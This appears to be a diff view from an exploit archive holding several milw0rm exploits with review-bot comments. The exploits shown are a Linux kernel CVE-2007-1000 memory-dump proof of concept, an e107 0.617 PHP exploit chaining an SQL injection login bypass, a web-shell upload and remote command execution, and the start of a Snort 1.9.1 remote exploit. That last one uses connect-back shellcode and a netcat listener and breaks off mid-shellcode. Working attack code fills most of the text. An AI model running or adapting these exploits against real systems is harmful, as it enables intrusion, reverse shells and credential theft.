* dreyer 07-2007 * dreyer 07-2007
* Osu, Tatakae, Sexy Pandas! * Osu, Tatakae, Sexy Pandas!
* *
* Dumps to stdout the memory mapped between INI and END. * Dumps to stdout the memory mapped between INI and END.
* *
* CVE: CVE-2007-1000 BID: 22904 * CVE: CVE-2007-1000 BID: 22904
* *
* Affected: Linux Kernel < 2.6.20.2 * Affected: Linux Kernel < 2.6.20.2
* *
* http://bugzilla.kernel.org/show_bug.cgi?id=8134 * http://bugzilla.kernel.org/show_bug.cgi?id=8134
* *
* Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
* *
* For free!!! ( worth 600 EUR in zerobay! ) * For free!!! ( worth 600 EUR in zerobay! )
* *
*/ */
#include <sys/mman.h> #include <sys/mman.h>
#include <netinet/in.h> #include <netinet/in.h>
#include <string.h> #include <string.h>
#include <stdlib.h> #include <stdlib.h>
#include <stdio.h> #include <stdio.h>
#define HOPOPT_OFFSET 8 #define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000 #define INIADDR 0xc0100000
#define ENDADDR 0xd0000000 #define ENDADDR 0xd0000000
unsigned int i; unsigned int i;
int main(int argc, char *argv[]) { int main(int argc, char *argv[]) {
int s; int s;
unsigned int optlen; unsigned int optlen;
void *ptr; void *ptr;
char value[10240]; char value[10240];
char text[12]; char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n" fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n" "dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR); "Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */ /* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0); setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */ /* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0); ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) { if (ptr != NULL) {
perror("mmap"); perror("mmap");
exit(-1); exit(-1);
} }
memset(ptr,0,4096); memset(ptr,0,4096);
/* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt = /* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt =
* 0x00000000 + 8 */ * 0x00000000 + 8 */
ptr=(char *)((char *)ptr+HOPOPT_OFFSET); ptr=(char *)((char *)ptr+HOPOPT_OFFSET);
i=INIADDR; i=INIADDR;
while(i<ENDADDR) { while(i<ENDADDR) {
/* Put in hopopt the address we want to read */ /* Put in hopopt the address we want to read */
*((int *)ptr)=i; *((int *)ptr)=i;
optlen=10240; optlen=10240;
/* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */ /* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen); getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
if(optlen>0) { if(optlen>0) {
sprintf(text,"\n%08x:",i); sprintf(text,"\n%08x:",i);
write(1,text,strlen(text)); write(1,text,strlen(text));
write(1,value,optlen); write(1,value,optlen);
i=i+optlen; i=i+optlen;
} else { } else {
/* We could not read this portion because of some error, skip it */ /* We could not read this portion because of some error, skip it */
i=i+4; i=i+4;
} }
} }
return 0; return 0;
} }
// milw0rm.com [2007-07-10] // milw0rm.com [2007-07-10]
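Review bot: the return value of getsockopt() inside the loop is never checked, and on failure the kernel leaves `optlen` at 10240, so the `if(optlen>0)` branch writes 10240 bytes of the stale `value` buffer to stdout and advances `i` by 10240, silently reporting unreadable ranges as data; test the return value and take the skip path on error. Also, `fprintf(..., "%p - %p", INIADDR, ENDADDR)` passes integer constants to a pointer conversion (undefined behaviour; cast to `void *` or use `%#x`), `optlen` should be `socklen_t` to match the getsockopt() prototype, and `<unistd.h>` is missing for write().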


@ -1,261 +1,261 @@
<?php <?php
# 0.27 18/10/2005 # # 0.27 18/10/2005 #
# # # #
# ---e017_xpl.php # # ---e017_xpl.php #
# # # #
# e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one # # e107 0.617 resetcore.php SQL Injection & remote code execution all-in-one #
# # # #
# by rgod # # by rgod #
# site: http://rgod.altervista.org # # site: http://rgod.altervista.org #
# # # #
# make these changes in php.ini if you have troubles # # make these changes in php.ini if you have troubles #
# to launch this script: # # to launch this script: #
# allow_call_time_pass_reference = on # # allow_call_time_pass_reference = on #
# register_globals = on # # register_globals = on #
# # # #
# usage: customize for your own pleasure, launch this script from Apache, # # usage: customize for your own pleasure, launch this script from Apache, #
# fill requested fields, then go! # # fill requested fields, then go! #
# # # #
# Sun-Tzu: "There is a proper season for making attacks with fire, and # # Sun-Tzu: "There is a proper season for making attacks with fire, and #
# special days for starting a conflagration. The proper season is when # # special days for starting a conflagration. The proper season is when #
# the weather is very dry; the special days are those when the moon is # # the weather is very dry; the special days are those when the moon is #
# in the constellations of the Sieve, the Wall, the Wing or the Cross-bar; # # in the constellations of the Sieve, the Wall, the Wing or the Cross-bar; #
# for these four are all days of rising wind." # # for these four are all days of rising wind." #
error_reporting(0); error_reporting(0);
ini_set("max_execution_time",0); ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2); ini_set("default_socket_timeout", 2);
ob_implicit_flush (1); ob_implicit_flush (1);
echo'<html><head><title>e107 0.617 remote commands execution </title><meta echo'<html><head><title>e107 0.617 remote commands execution </title><meta
http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style
type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff; type="text/css"> body { background-color:#111111; SCROLLBAR-ARROW-COLOR:#ffffff;
SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img
{background-color: #FFFFFF !important} input {background-color: #303030 {background-color: #FFFFFF !important} input {background-color: #303030
!important} option { background-color: #303030 !important} textarea !important} option { background-color: #303030 !important} textarea
{background-color: #303030 !important} input {color: #1CB081 !important} option {background-color: #303030 !important} input {color: #1CB081 !important} option
{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox {color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox
{background-color: #303030 !important} select {font-weight: normal; color: {background-color: #303030 !important} select {font-weight: normal; color:
#1CB081; background-color: #303030;} body {font-size: 8pt !important; #1CB081; background-color: #303030;} body {font-size: 8pt !important;
background-color: #111111; body * {font-size: 8pt !important} h1 {font-size: background-color: #111111; body * {font-size: 8pt !important} h1 {font-size:
0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em 0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em
!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em !important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em
!important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em !important} h2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em
!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style: !important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:
normal !important} *{text-decoration: none !important} a:link,a:active,a:visited normal !important} *{text-decoration: none !important} a:link,a:active,a:visited
{ text-decoration: none ; color : #1CBc81; } a:hover{text-decoration: underline; { text-decoration: none ; color : #1CBc81; } a:hover{text-decoration: underline;
color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; color : #1CB081; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6"> font-weight:bold; font-style: italic;}--></style></head><body><p class="Stile6">
e107 0.617 resetcore.php SQL injection & remote commands execution </p> <p> e107 0.617 resetcore.php SQL injection & remote commands execution </p> <p>
<class="Stile6"> a script byrgod at <a href="http://rgod.altervista.org" <class="Stile6"> a script byrgod at <a href="http://rgod.altervista.org"
target="_blank">http://rgod.altervista.org</a></p> <table width="84%"><tr> <td target="_blank">http://rgod.altervista.org</a></p> <table width="84%"><tr> <td
width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].' width="43%"> <form name="form1" method="post" action="'.$SERVER[PHP_SELF].'
?path=value&host=value&port=value&command=value&proxy=value"> <p> <input ?path=value&host=value&port=value&command=value&proxy=value"> <p> <input
type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename.com) type="text" name="host"><span class="Stile5"> hostname (ex: www.sitename.com)
</span></p><p> <input type="text" name="path"><span class="Stile5">path (ex: /e1 </span></p><p> <input type="text" name="path"><span class="Stile5">path (ex: /e1
07/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5"> 07/ or just /)</span></p><p><input type="text" name="port"><span class="Stile5">
specify a port other than 80 (default value) </span> </p> <p><input type="text" specify a port other than 80 (default value) </span> </p> <p><input type="text"
name="command"><span class="Stile5">a shell command, cat ./../../e107_config. name="command"><span class="Stile5">a shell command, cat ./../../e107_config.
php to see database username/password </span> </p> <p> <input type="text" php to see database username/password </span> </p> <p> <input type="text"
name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port) name="proxy"><span class="Stile5">send exploit through an HTTP proxy (ip:port)
</span></p><p><input type="submit" name="Submit" value="go!"> </p></form></td> </span></p><p><input type="submit" name="Submit" value="go!"> </p></form></td>
</tr></table></body></html>'; </tr></table></body></html>';
function show($headeri) function show($headeri)
{ {
$ii=0; $ii=0;
$ji=0; $ji=0;
$ki=0; $ki=0;
$ci=0; $ci=0;
echo '<table border="0"><tr>'; echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1) while ($ii <= strlen($headeri)-1)
{ {
$datai=dechex(ord($headeri[$ii])); $datai=dechex(ord($headeri[$ii]));
if ($ji==16) { if ($ji==16) {
$ji=0; $ji=0;
$ci++; $ci++;
echo "<td>&nbsp;&nbsp;</td>"; echo "<td>&nbsp;&nbsp;</td>";
for ($li=0; $li<=15; $li++) for ($li=0; $li<=15; $li++)
{ echo "<td>".$headeri[$li+$ki]."</td>"; { echo "<td>".$headeri[$li+$ki]."</td>";
} }
$ki=$ki+16; $ki=$ki+16;
echo "</tr><tr>"; echo "</tr><tr>";
} }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";} {echo "<td>".$datai."</td> ";}
$ii++; $ii++;
$ji++; $ji++;
} }
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
{ echo "<td>&nbsp&nbsp</td>"; { echo "<td>&nbsp&nbsp</td>";
} }
for ($li=$ci*16; $li<=strlen($headeri); $li++) for ($li=$ci*16; $li<=strlen($headeri); $li++)
{ echo "<td>".$headeri[$li]."</td>"; { echo "<td>".$headeri[$li]."</td>";
} }
echo "</tr></table>"; echo "</tr></table>";
} }
function sendpacket($packet) function sendpacket($packet)
{ {
global $proxy, $host, $port, $html; global $proxy, $host, $port, $html;
if ($proxy=='') if ($proxy=='')
{$ock=fsockopen(gethostbyname($host),$port);} {$ock=fsockopen(gethostbyname($host),$port);}
else else
{ {
$proxy=trim($proxy); $proxy=trim($proxy);
$parts=explode(':',$proxy); $parts=explode(':',$proxy);
echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>'; echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
$ock=fsockopen($parts[0],$parts[1]); $ock=fsockopen($parts[0],$parts[1]);
if (!$ock) { echo 'No response from proxy...'; if (!$ock) { echo 'No response from proxy...';
die; die;
} }
} }
fputs($ock,$packet); fputs($ock,$packet);
if ($proxy=='') if ($proxy=='')
{ {
$html=''; $html='';
while (!feof($ock)) while (!feof($ock))
{ {
$html.=fgets($ock); $html.=fgets($ock);
} }
} }
else else
{ {
$html=''; $html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{ {
$html.=fread($ock,1); $html.=fread($ock,1);
} }
} }
fclose($ock); fclose($ock);
echo nl2br(htmlentities($html)); echo nl2br(htmlentities($html));
} }
if (($path<>'') and ($host<>'') and ($command<>'')) if (($path<>'') and ($host<>'') and ($command<>''))
{ {
$port=intval($port); $port=intval($port);
if (($port=='') or ($port<=0)) {$port=80;} if (($port=='') or ($port<=0)) {$port=80;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port); echo 'Initiating exploit against '.htmlentities($host).':'.htmlentities($port);
#STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings #STEP 1 -> SQL INJECTION in resetcore.php, bypass login and change upload settings
$data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)." $data.="sitename=e107+powered+website&siteurl=".urlencode('http://'.$host.':'.$port.$path)."
&sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu &sitebutton=button.png&sitetag=e107+website+system&sitedescription=&siteadmin=suntzu
&siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a &siteadminemail=fakefakefake@suntzu.com&sitetheme=e107v4a&admintheme=e107v4a
&sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+ &sitedisclaimer=All+trademarks+are+%A9+their+respective+owners%2C+all+other+content+
is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+% is+%A9+e107+powered+website.%3Cbr+%2F%3Ee107+is+%A9+e107.org+2002%2F2003+and+is+released+under+the+%
3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E. 3Ca+href%3D%27http%3A%2F%2Fwww.gnu.org%2F%27%3EGNU+GPL+license%3C%2Fa%3E.
&newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1 &newsposts=10&flood_protect=1&flood_timeout=5&flood_time=30&flood_hits=100&anon_post=1
&user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10& &user_reg=1&use_coppa=1&profanity_filter=1&profanity_replace=%5Bcensored%5D&chatbox_posts=10&
smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S& smiley_activate=&log_activate=&log_refertype=1&longdate=%25A+%25d+%25B+%25Y+-+%25H%3A%25M%3A%25S&
shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage= shortdate=%25d+%25b+%3A+%25H%3A%25M&forumdate=%25a+%25b+%25d+%25Y%2C+%25I%3A%25M%25p&sitelanguage=
English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1& English&maintainance_flag=0&time_offset=0&cb_linkc=+-link-+&cb_wordwrap=20&cb_linkreplace=1&
log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0& log_lvcount=10&meta_tag=&user_reg_veri=1&email_notify=0&forum_poll=0&forum_popular=10&forum_track=0&
forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie& forum_eprefix=%5Bforum%5D&forum_enclose=1&forum_title=Forums&forum_postspage=10&user_tracking=cookie&
cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80& cookie_name=e107cookie&resize_method=gd2&im_path=%2Fusr%2FX11R6%2Fbin%2Fconvert&im_quality=80&
im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php& im_width=120&im_height=100&upload_enabled=1&upload_allowedfiletype=.php&
upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1& upload_storagetype=2&upload_maxfilesize=&upload_class=254&cachestatus=&displayrendertime=1&
displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1& displaysql=&displaythemeinfo=1&link_submit=1&link_submit_class=0&timezone=GMT&search_restrict=1&
antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name="; antiflood1=1&antiflood_timeout=10&autoban=1&coreedit_sub=Save+Core+Settings&a_name=";
$data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e"; $data.=urlencode("'or isnull(1/0)/*")."&a_password=d41d8cd98f00b204e9800998ecf8427e";
// ^ ^ // ^ ^
// | | // | |
// here we have login bypass ;) hash of [nothing] // here we have login bypass ;) hash of [nothing]
//so, you see, we activate public uploads and .php extensions for attachments //so, you see, we activate public uploads and .php extensions for attachments
$packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n"; $packet="POST ".$p."e107_files/resetcore.php HTTP/1.1\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n"; $packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n"; $packet.="Referer: http://".$host.":".$port.$path."e107_files/resetcore.php\r\n";
$packet.="Accept-Language: it\r\n"; $packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n"; $packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n"; $packet.="User-Agent: Matrix S.p.A. - FAST Enterprise Crawler 6 (Unknown admin e-mail address)\r\n";
$packet.="Host: ".$host.":".$port."\r\n"; $packet.="Host: ".$host.":".$port."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n"; $packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n"; $packet.="Cache-Control: no-cache\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; $packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data; $packet.=$data;
show($packet); show($packet);
sendpacket($packet); sendpacket($packet);
if (eregi("Core settings successfully updated",$html)) {echo '<br>Ok... we reset core values...Continue...';} if (eregi("Core settings successfully updated",$html)) {echo '<br>Ok... we reset core values...Continue...';}
else {echo '<br>Exploit failed...'; die;} else {echo '<br>Exploit failed...'; die;}
#STEP 2 -> Upload a shell... #STEP 2 -> Upload a shell...
$data='------------W1dUnnWzZExD8Rb1Pctwsq $data='------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_name" Content-Disposition: form-data; name="file_name"
baby baby
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_version" Content-Disposition: form-data; name="file_version"
666 666
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php" Content-Disposition: form-data; name="file_userfile[]"; filename="c:\suntzu.php"
Content-Type: multipart/form-data Content-Type: multipart/form-data
<?php error_reporting(0); ini_set("max_execution_time",0); <?php error_reporting(0); ini_set("max_execution_time",0);
echo "Hi Master\r\n"; system($HTTP_GET_VARS[cmd]); ?> echo "Hi Master\r\n"; system($HTTP_GET_VARS[cmd]); ?>
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_userfile[]"; filename="" Content-Disposition: form-data; name="file_userfile[]"; filename=""
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_description" Content-Disposition: form-data; name="file_description"
mphhh.... mphhh....
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_website" Content-Disposition: form-data; name="file_website"
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="file_demo" Content-Disposition: form-data; name="file_demo"
------------W1dUnnWzZExD8Rb1Pctwsq ------------W1dUnnWzZExD8Rb1Pctwsq
Content-Disposition: form-data; name="upload" Content-Disposition: form-data; name="upload"
Submit and Upload Submit and Upload
------------W1dUnnWzZExD8Rb1Pctwsq--'; ------------W1dUnnWzZExD8Rb1Pctwsq--';
$packet="POST ".$p."upload.php HTTP/1.1\r\n"; $packet="POST ".$p."upload.php HTTP/1.1\r\n";
$packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n"; $packet.="User-Agent: Nokia7110/1.0 (05.01) (Google WAP Proxy/1.0)\r\n";
$packet.="Host: ".$host.":".$port."\r\n"; $packet.="Host: ".$host.":".$port."\r\n";
$packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n"; $packet.="Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$packet.="Accept-Language: it,en;q=0.9\r\n"; $packet.="Accept-Language: it,en;q=0.9\r\n";
$packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n"; $packet.="Accept-Charset: windows-1252, utf-8, utf-16, iso-8859-1;q=0.6, *;q=0.1\r\n";
$packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n"; $packet.="Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n";
$packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n"; $packet.="Referer: http://".$host.":".$port.$path."upload.php\r\n";
$packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n"; $packet.="Cookie: e107cookie=1.dcc479d5ffe15c00b2263328f1d60da4\r\n";
$packet.="Cookie2: \$Version=1\r\n"; $packet.="Cookie2: \$Version=1\r\n";
$packet.="Connection: Close, TE\r\n"; $packet.="Connection: Close, TE\r\n";
$packet.="TE: deflate, gzip, chunked, identity, trailers\r\n"; $packet.="TE: deflate, gzip, chunked, identity, trailers\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n"; $packet.="Content-Type: multipart/form-data; boundary=----------W1dUnnWzZExD8Rb1Pctwsq\r\n\r\n";
$packet.=$data; $packet.=$data;
show($packet); show($packet);
sendpacket($packet); sendpacket($packet);
#STEP 3 -> Launch commands... #STEP 3 -> Launch commands...
$packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n"; $packet="GET ".$p."e107_files/public/suntzu.php?cmd=".urlencode($command)." HTTP/1.1\r\n";
$packet.="User-Agent: Website eXtractor\r\n"; $packet.="User-Agent: Website eXtractor\r\n";
$packet.="Host: ".$host."\r\n"; $packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n"; $packet.="Connection: Close\r\n\r\n";
show($packet); show($packet);
sendpacket($packet); sendpacket($packet);
if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';} if (eregi("Hi Master",$html)) {echo 'Exploit succeeded...';}
else {echo 'Exploit failed...';} else {echo 'Exploit failed...';}
} }
else else
{echo 'Fill in requested fields, optionally specify a proxy...';} {echo 'Fill in requested fields, optionally specify a proxy...';}
?> ?>
# milw0rm.com [2005-10-18] # milw0rm.com [2005-10-18]
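Review bot: every line of this hunk is identical in both columns, so the change is whitespace or line-ending normalisation only, and the commit message ("Updated 12_08_2013") should say so; otherwise a reviewer has to read two hundred lines of exploit code to find that nothing changed. On the file itself, two points worth recording in its header for anyone cataloguing it: `$path`, `$host`, `$port`, `$command` and `$proxy` are read as bare globals populated by register_globals, and `eregi()` no longer exists in current PHP, so the script only runs under the PHP 4/5 configurations of its era; and `$SERVER[PHP_SELF]` in the form action is missing the underscore and the quotes, so the generated form posts to an empty action.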

View file

@ -556,6 +556,6 @@ int GetNextAddr(int Addr)
} }
return(Addr); return(Addr);
} }
// milw0rm.com [2003-12-27] // milw0rm.com [2003-12-27]

View file

@ -1,143 +1,143 @@
#!/bin/sh #!/bin/sh
########################################################## ##########################################################
# p7snort191.sh by truff (truff@projet7.org) # # p7snort191.sh by truff (truff@projet7.org) #
# Snort 1.9.1 and below remote exploit # # Snort 1.9.1 and below remote exploit #
# # # #
# Tested on Slackware 8.0 with Snort 1.9.1 from sources # # Tested on Slackware 8.0 with Snort 1.9.1 from sources #
# # # #
# Usage: # # Usage: #
# 1/ Launch a listening netcat to listen for the shell # # 1/ Launch a listening netcat to listen for the shell #
# nc -p 45295 -l # # nc -p 45295 -l #
# # # #
# 2/ p7snort119.sh yourIP [Ret_Addr] # # 2/ p7snort119.sh yourIP [Ret_Addr] #
# # # #
# Where yourIP is the IP where the netcat is listening # # Where yourIP is the IP where the netcat is listening #
# and Ret_Addr is the address (8 hexa digits) of the # # and Ret_Addr is the address (8 hexa digits) of the #
# shellcode (eg: 0819fec2) # # shellcode (eg: 0819fec2) #
# # # #
# # # #
# This vulnerability was discovered by Bruce Leidl, # # This vulnerability was discovered by Bruce Leidl, #
# Juan Pablo Martinez Kuhn, and Alejandro David Weil # # Juan Pablo Martinez Kuhn, and Alejandro David Weil #
# from Core Security Technologies during Bugweek 2003. # # from Core Security Technologies during Bugweek 2003. #
# # # #
# Greetz to #root people and projet7 members. # # Greetz to #root people and projet7 members. #
# Special thx to mycroft for helping me with shell # # Special thx to mycroft for helping me with shell #
# scripting stuff. # # scripting stuff. #
# # # #
# www.projet7.org - Security Researchs - # # www.projet7.org - Security Researchs - #
########################################################## ##########################################################
# Put here the path to your hping2 binary # Put here the path to your hping2 binary
HPING2=/usr/sbin/hping2 HPING2=/usr/sbin/hping2
# You should change these params to make the snort sensor # You should change these params to make the snort sensor
# capture the packets. # capture the packets.
IPSRC=192.168.22.1 IPSRC=192.168.22.1
IPDST=192.168.22.2 IPDST=192.168.22.2
PTSRC=3339 PTSRC=3339
PTDST=111 PTDST=111
echo "p7snort191.sh by truff (truff@projet7.org)" echo "p7snort191.sh by truff (truff@projet7.org)"
case $# in case $# in
0) 0)
echo "Bad number of params" echo "Bad number of params"
echo "Read comments in sources" echo "Read comments in sources"
exit -1 exit -1
;; ;;
1) 1)
RET=0819fec2 RET=0819fec2
echo "Using default retaddr (Slackware 8.0)" echo "Using default retaddr (Slackware 8.0)"
echo $RET echo $RET
;; ;;
2) 2)
RET=$2 RET=$2
echo "Using custom retaddr" echo "Using custom retaddr"
echo $RET echo $RET
;; ;;
*) *)
echo "Bad number of params" echo "Bad number of params"
echo "Read comments in sources" echo "Read comments in sources"
exit -1 exit -1
;; ;;
esac esac
# Nops # Nops
i=0 i=0
while [ "$i" -lt "512" ]; do while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1) i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg echo -n -e "\x90" >> egg
done done
# linux x86 shellcode by eSDee of Netric (www.netric.org) # linux x86 shellcode by eSDee of Netric (www.netric.org)
# 131 byte - connect back shellcode (port=0xb0ef) # 131 byte - connect back shellcode (port=0xb0ef)
echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
echo -n -e "\x68" >> egg echo -n -e "\x68" >> egg
# IP here # IP here
